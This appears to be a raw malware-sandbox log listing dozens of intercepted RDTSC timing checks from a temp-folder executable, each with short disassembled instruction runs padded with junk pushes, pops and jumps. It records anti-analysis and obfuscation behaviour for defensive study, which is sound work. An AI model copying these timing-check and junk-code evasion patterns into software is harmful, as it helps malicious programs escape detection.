Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 6DA49E second address: 6DA4AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 6DA381 second address: 6DA385 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 6D5A7E second address: 6D5A82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 6FF482 second address: 6FF491 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FF698BF10C6h 0x0000000a pop eax 0x0000000b push edi 0x0000000c pushad 0x0000000d popad 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 6FF491 second address: 6FF4C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 ja 00007FF698E1E1A6h 0x00000009 pop eax 0x0000000a jnp 00007FF698E1E1BEh 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 6FF4C0 second address: 6FF4C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 6FF96D second address: 6FF98A instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FF698E1E1A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FF698E1E1B3h 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 700055 second address: 70006F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF698BF10D4h 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 7032EC second address: 7032F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 705E9C second address: 705EA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 706229 second address: 70622D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 707C8E second address: 707C94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 707C94 second address: 707C98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 7077DC second address: 707815 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jbe 00007FF698BF10C6h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FF698BF10D9h 0x00000017 jmp 00007FF698BF10CEh 0x0000001c rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 709796 second address: 7097AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF698E1E1B2h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 7097AD second address: 7097BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF698BF10CBh 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 7097BF second address: 7097CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push ebx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C80E79 second address: 4C80EC0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FF698BF10CFh 0x00000008 pop esi 0x00000009 jmp 00007FF698BF10D9h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FF698BF10D3h 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C80EC0 second address: 4C80EDD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF698E1E1B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C80EDD second address: 4C80EE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C80EE3 second address: 4C80EE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C80EE7 second address: 4C80F22 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF698BF10D3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d jmp 00007FF698BF10D4h 0x00000012 mov eax, 277E87F1h 0x00000017 popad 0x00000018 mov ebp, esp 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C80019 second address: 4C8006F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF698E1E1B7h 0x00000008 movzx eax, bx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ecx 0x0000000f jmp 00007FF698E1E1B0h 0x00000014 mov dword ptr [esp], ebp 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a pushfd 0x0000001b jmp 00007FF698E1E1ACh 0x00000020 sbb esi, 6B4AF548h 0x00000026 jmp 00007FF698E1E1ABh 0x0000002b popfd 0x0000002c rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C8006F second address: 4C80091 instructions: 0x00000000 rdtsc 0x00000002 movzx esi, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push edi 0x00000008 call 00007FF698BF10D0h 0x0000000d pop esi 0x0000000e pop edi 0x0000000f popad 0x00000010 mov ebp, esp 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C80091 second address: 4C8009B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov edx, 4FA16BECh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C8009B second address: 4C800BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx eax, bx 0x00000006 movsx ebx, si 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ebp 0x0000000d pushad 0x0000000e jmp 00007FF698BF10D2h 0x00000013 push eax 0x00000014 push edx 0x00000015 mov ch, 98h 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4CB068B second address: 4CB06CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF698E1E1ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FF698E1E1B6h 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FF698E1E1B7h 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4CB06CC second address: 4CB06D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4CB06D2 second address: 4CB06E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov cx, 703Fh 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C5018F second address: 4C501A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF698BF10D4h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C501C5 second address: 4C5021B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 pushfd 0x00000008 jmp 00007FF698E1E1B9h 0x0000000d adc al, FFFFFFE6h 0x00000010 jmp 00007FF698E1E1B1h 0x00000015 popfd 0x00000016 pop eax 0x00000017 popad 0x00000018 pop ebp 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FF698E1E1B9h 0x00000022 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C5021B second address: 4C50230 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF698BF10D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C50230 second address: 4C50240 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF698E1E1ACh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C50240 second address: 4C50244 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C70D33 second address: 4C70D37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C70D37 second address: 4C70D54 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF698BF10D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C70D54 second address: 4C70D71 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF698E1E1B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C70D71 second address: 4C70D75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C70D75 second address: 4C70D79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C70D79 second address: 4C70D7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C70D7F second address: 4C70D85 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C70D85 second address: 4C70D89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C7088F second address: 4C70895 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C70895 second address: 4C708B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FF698BF10D9h 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C708B9 second address: 4C708C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF698E1E1ACh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C708C9 second address: 4C708CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C708CD second address: 4C70909 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FF698E1E1AFh 0x00000012 add cx, DE5Eh 0x00000017 jmp 00007FF698E1E1B9h 0x0000001c popfd 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C70909 second address: 4C7090F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C7090F second address: 4C70913 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C70913 second address: 4C70917 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C70917 second address: 4C70944 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007FF698E1E1AFh 0x0000000e mov ebp, esp 0x00000010 pushad 0x00000011 mov esi, 2095792Bh 0x00000016 mov ecx, 78707D07h 0x0000001b popad 0x0000001c pop ebp 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C70944 second address: 4C7094A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C7094A second address: 4C70950 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C707D7 second address: 4C707F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF698BF10D0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C707F2 second address: 4C707F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C707F6 second address: 4C707FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C70594 second address: 4C7059A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4CB05A9 second address: 4CB05AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4CB05AD second address: 4CB05D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF698E1E1B7h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4CB05D0 second address: 4CB05D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4CB05D4 second address: 4CB05DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4CB05DA second address: 4CB05E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C902E9 second address: 4C902EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C902EF second address: 4C902F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C902F3 second address: 4C90330 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007FF698E1E1B9h 0x0000000f mov eax, dword ptr [ebp+08h] 0x00000012 jmp 00007FF698E1E1AEh 0x00000017 and dword ptr [eax], 00000000h 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C90330 second address: 4C90334 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C90334 second address: 4C9033A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C9033A second address: 4C90367 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF698BF10D4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and dword ptr [eax+04h], 00000000h 0x0000000d pushad 0x0000000e call 00007FF698BF10CEh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C90367 second address: 4C9037B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 pop eax 0x00000009 popad 0x0000000a pop ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov eax, 6F2D5461h 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C70693 second address: 4C70697 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C70697 second address: 4C7069D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C7069D second address: 4C70718 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, 3D4E9D0Fh 0x00000008 push eax 0x00000009 pop edi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e jmp 00007FF698BF10D1h 0x00000013 xchg eax, ebp 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007FF698BF10D3h 0x0000001d and eax, 37AEA87Eh 0x00000023 jmp 00007FF698BF10D9h 0x00000028 popfd 0x00000029 pushfd 0x0000002a jmp 00007FF698BF10D0h 0x0000002f adc ecx, 1D45BB78h 0x00000035 jmp 00007FF698BF10CBh 0x0000003a popfd 0x0000003b popad 0x0000003c rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C70718 second address: 4C7073D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF698E1E1B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C7073D second address: 4C70741 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C70741 second address: 4C70745 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C70745 second address: 4C7074B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C80D72 second address: 4C80DFD instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FF698E1E1AEh 0x00000008 xor si, C8A8h 0x0000000d jmp 00007FF698E1E1ABh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 push eax 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007FF698E1E1AFh 0x0000001e jmp 00007FF698E1E1B3h 0x00000023 popfd 0x00000024 popad 0x00000025 xchg eax, ebp 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 pushfd 0x0000002a jmp 00007FF698E1E1AEh 0x0000002f sbb ecx, 6A5C5D68h 0x00000035 jmp 00007FF698E1E1ABh 0x0000003a popfd 0x0000003b call 00007FF698E1E1B8h 0x00000040 pop ecx 0x00000041 popad 0x00000042 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C90104 second address: 4C90108 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C90108 second address: 4C9010E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C9010E second address: 4C90114 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C90114 second address: 4C9012F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF698E1E1AFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C9012F second address: 4C90135 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C90135 second address: 4C9013A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C9013A second address: 4C90152 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF698BF10CCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov ecx, ebx 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4C90152 second address: 4C9017B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF698E1E1B5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF698E1E1ADh 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4CA0CE0 second address: 4CA0CE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 4CA0CE4 second address: 4CA0CE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
